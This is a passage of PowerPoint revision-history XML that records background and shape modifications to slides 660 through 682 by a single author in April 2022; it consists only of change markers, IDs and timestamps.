        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2202388216" sldId="660"/>
            <ac:spMk id="5" creationId="{C0013443-7B2B-4D67-BD7F-3055385EEEA3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4233004780" sldId="661"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4233004780" sldId="661"/>
            <ac:spMk id="2" creationId="{2B27A607-EF5C-4057-9081-1313C00B6B32}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4233004780" sldId="661"/>
            <ac:spMk id="3" creationId="{C1D071C9-6902-4EA2-9442-37724F3607D1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2893405489" sldId="662"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2893405489" sldId="662"/>
            <ac:spMk id="2" creationId="{780383C6-57B4-4EBA-AAAE-C4E3C2CFC4C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2893405489" sldId="662"/>
            <ac:spMk id="3" creationId="{B7FD8530-83C0-4D10-A8E9-3815D00B3811}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="334931818" sldId="663"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334931818" sldId="663"/>
            <ac:spMk id="2" creationId="{7136574A-7572-4A37-9A72-3C2724CD80E2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334931818" sldId="663"/>
            <ac:spMk id="3" creationId="{CEF2D317-28CB-471F-BFDF-840EB487CAE0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3625233124" sldId="664"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625233124" sldId="664"/>
            <ac:spMk id="2" creationId="{0B511C53-95CD-49AF-B98B-E81D1583BED2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625233124" sldId="664"/>
            <ac:spMk id="3" creationId="{A92A8ABD-1897-4051-80A9-C44C0C08FF2A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="546372122" sldId="665"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="546372122" sldId="665"/>
            <ac:spMk id="2" creationId="{5C437C9D-A4F7-4F32-8624-B4BE30C879CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="546372122" sldId="665"/>
            <ac:spMk id="3" creationId="{AA669423-5F69-4698-A277-3D3C73DEF7DA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3330815181" sldId="666"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3330815181" sldId="666"/>
            <ac:spMk id="2" creationId="{77845A3F-202A-45BF-BAEA-B697C3E9B911}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3330815181" sldId="666"/>
            <ac:spMk id="3" creationId="{5C3EB5EF-30AC-4227-912A-D2A6F062CD77}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2612935851" sldId="667"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2612935851" sldId="667"/>
            <ac:spMk id="2" creationId="{853DEFED-8BBF-4AF2-9E92-4A2D8DAFE54F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2612935851" sldId="667"/>
            <ac:spMk id="3" creationId="{1DF6DEE2-9820-46AF-91FD-78429E36BC97}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3722631733" sldId="668"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3722631733" sldId="668"/>
            <ac:spMk id="2" creationId="{896FB409-4487-4B34-A32E-819956C8AA25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3722631733" sldId="668"/>
            <ac:spMk id="3" creationId="{BEB51D06-5624-42D0-A25D-34687061ED34}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2954009098" sldId="669"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2954009098" sldId="669"/>
            <ac:spMk id="2" creationId="{896FB409-4487-4B34-A32E-819956C8AA25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2954009098" sldId="669"/>
            <ac:spMk id="3" creationId="{BEB51D06-5624-42D0-A25D-34687061ED34}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3835330773" sldId="670"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3835330773" sldId="670"/>
            <ac:spMk id="2" creationId="{896FB409-4487-4B34-A32E-819956C8AA25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3835330773" sldId="670"/>
            <ac:spMk id="3" creationId="{BEB51D06-5624-42D0-A25D-34687061ED34}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4070412797" sldId="671"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4070412797" sldId="671"/>
            <ac:spMk id="2" creationId="{C8C29C87-062F-4720-ADF6-F360197FC999}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4070412797" sldId="671"/>
            <ac:spMk id="3" creationId="{3BA9F60C-524B-4412-BA47-D4F5400F8AF7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1246459972" sldId="672"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1246459972" sldId="672"/>
            <ac:spMk id="2" creationId="{73A32121-4281-4D9C-9694-027530E3589E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1246459972" sldId="672"/>
            <ac:spMk id="3" creationId="{C7CF31FE-4D92-4C81-B9CB-7AAA13976CC2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3976014290" sldId="673"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3976014290" sldId="673"/>
            <ac:spMk id="2" creationId="{D1E1691E-841D-479A-9BE9-1F702DAF49CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3976014290" sldId="673"/>
            <ac:spMk id="3" creationId="{3A345AA2-4FD8-43D1-BAAC-35F80ABCF5B9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1542441904" sldId="674"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1542441904" sldId="674"/>
            <ac:spMk id="2" creationId="{B3819356-8246-4338-A5C5-FE6E130B5169}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1542441904" sldId="674"/>
            <ac:spMk id="3" creationId="{C762A538-86C4-475D-930B-7D32B71FEEFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1542441904" sldId="674"/>
            <ac:spMk id="5" creationId="{B44B9C72-6D7E-4A49-8FE2-1D05455F61E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2825810820" sldId="675"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2825810820" sldId="675"/>
            <ac:spMk id="2" creationId="{DAF66A36-5B67-46F3-A894-FD344E608C7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2825810820" sldId="675"/>
            <ac:spMk id="3" creationId="{743D518C-A1C5-467B-B99C-C623B31885A7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1409029590" sldId="676"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1409029590" sldId="676"/>
            <ac:spMk id="2" creationId="{3BD2A5FB-4B88-43D8-9147-AA14D5CB2F28}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1409029590" sldId="676"/>
            <ac:spMk id="3" creationId="{FDD5B93D-E151-4900-A5D2-0E567CD5F898}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="807662616" sldId="677"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="807662616" sldId="677"/>
            <ac:spMk id="2" creationId="{28407936-A4BD-4BED-B4EA-5D03644CFA73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="807662616" sldId="677"/>
            <ac:spMk id="3" creationId="{C2BFC8C7-FF13-4501-8E46-D2B60C56E5E0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1284345964" sldId="678"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1284345964" sldId="678"/>
            <ac:spMk id="2" creationId="{0F8157DF-53E2-47DA-AF3C-754CA9563D94}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1284345964" sldId="678"/>
            <ac:spMk id="3" creationId="{63DD3E70-00AF-40C5-BFB4-23B69F12C3BE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3311758732" sldId="679"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3311758732" sldId="679"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3872845466" sldId="680"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3872845466" sldId="680"/>
            <ac:spMk id="4" creationId="{F0F957D6-27C0-6E42-8C05-8D1320AD1BDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1673727697" sldId="681"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1673727697" sldId="681"/>
            <ac:spMk id="7" creationId="{E3CBD11B-49AB-450C-8399-EBF69253C10E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1673727697" sldId="681"/>
            <ac:spMk id="8" creationId="{9FE2540A-F81D-440C-B849-1EDF852385B8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2748516836" sldId="682"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
